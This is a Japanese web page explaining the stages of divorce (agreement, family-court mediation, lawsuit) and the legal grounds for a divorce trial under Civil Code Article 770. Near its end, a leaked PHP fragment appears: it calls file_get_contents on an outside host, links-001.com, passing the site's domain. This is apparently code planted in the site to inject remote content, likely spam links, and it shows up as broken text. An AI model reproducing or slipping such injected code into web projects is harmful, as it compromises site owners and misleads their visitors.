前へ
次へ

離婚裁判と離婚調停はどちらの方がいいのか

離婚をする人の大半は協議離婚で行っています。つまりは夫婦間の話し合いのみで解決し、書類を提出して離婚

more

浮気不倫が原因の離婚裁判

浮気が原因で離婚する夫婦も増えています。不貞行為を裁判で訴えて勝つためには、有効な証拠が必要です。け

more

離婚裁判の前に行われる調停では何をするか

離婚と言えば暗いイメージを持つかもしれませんが、互いの新しい人生のことを考えると明るい決断になること

more

難しく考えない離婚裁判

離婚に至るまでには、夫婦にとっては苦悩する期間であることは間違いないでしょう。今後のこと、子どものこと、生活費や教育費について、話し合いや手続きも上手な進め方があります。円満に解決できない、そうした場合には「離婚裁判」に発展するため、そうなれば、段階的に手続きをする分だけ、離婚届が受理されるまでの期間は1年以上かかるケースも少なくありません。夫婦で離婚の話し合いが持たれたり、親や共通の友人に協力してもらったり、弁護士による離婚手続を踏むこともあります。離婚弁護士という実績あるプロの士業者いわく、離婚には協議・離婚調停・離婚訴訟という段階で解決されるそうです。子どもの親権に合致があっても、いざ教育費の支払いを決める時に条件等が合致しない、そうした場合に裁判所を介して離婚調停というふうに流れます。ちなみに、離婚訴訟を提起するには家庭裁判所に申し立てることをしなければなりませんし、調停委員による意見調査が行われます。オブラードに包めない赤裸々なことも話す必要もあります。双方のわだかまりのタネを調整してくれる役割を調停委員が努めるため、円満合意するケースが大半を占めます。中には、子どもの将来性も考え、冷却期間のため別居の合意を、そうした話し合いにも役立てられる方法です。しかし不成立という場合には、離婚裁判とした訴訟を提起する流れに移ります。難しい話ではなく、協議・離婚調停・離婚訴訟の違いは、法律で定められている離婚原因であるか否かというだけです。夫婦の合意だけで成立するのとは違い、裁判に関して法律が立ちはだかっていて、性格の不一致で離婚したいという離婚原因は法律上認められません。それだけ遊び半分で提起できないのです。裁判官による判決、そこには不貞な行為がある、生死が不明で相手と交渉すらできない、そして婚姻を継続し難い重大な事由がある、などの民法770条に規定される場合に限られているのです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top